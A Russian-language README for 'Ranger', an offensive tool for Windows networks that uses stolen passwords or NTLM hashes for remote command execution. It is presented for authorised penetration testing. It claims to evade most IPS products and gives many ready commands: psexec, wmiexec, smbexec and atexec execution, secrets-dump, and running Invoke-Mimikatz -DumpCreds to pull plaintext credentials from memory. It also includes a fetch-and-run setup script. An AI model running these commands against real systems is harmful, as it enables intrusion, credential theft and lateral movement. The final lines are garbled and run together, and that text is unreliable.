
Инструмент для специалистов по безопасности для доступа и взаимодействия с удаленными системами на базе Microsoft Windows.
Инструмент для поддержки специалистов по безопасности при доступе и взаимодействии с удаленными системами на базе Microsoft Windows.
Этот проект был задуман с мыслью: мы не изобрели лук или стрелу, а лишь нашли более эффективный способ их использования.
Ranger — это инструмент для атак и тестирования на проникновение, управляемый из командной строки, который может использовать инстанциированный сервер-катапульту для доставки возможностей против систем Windows. Пока у пользователя есть набор учетных данных или хэшей (NTLM, LM, LM:NTLM), он или она может получить доступ к системам, входящим в доверенную зону.
Используя эту возможность, специалист по безопасности может извлекать учетные данные из памяти в открытом виде, получать доступ к таблицам SAM, выполнять команды, запускать скрипты PowerShell, двоичные файлы Windows и другие инструменты. В настоящее время инструмент обходит большинство решений IPS от вендоров, если только они не были специально настроены для его обнаружения. Инструмент был разработан с использованием наших домашних лабораторий для поддержки специалистов по безопасности, выполняющих законные и/или контрактные действия.
Добавляется всё больше функциональности, но на данный момент инструмент использует вклады сообщества из репозиториев, связанных с командами PowerShell PowerView, PowerShell Mimikatz и Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain, который позволяет вам указать другой домен, отличный от того, в который вы вошлиranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, это будет означать, что вы хотите игнорировать все доменные имена в файле.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt в командах на e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml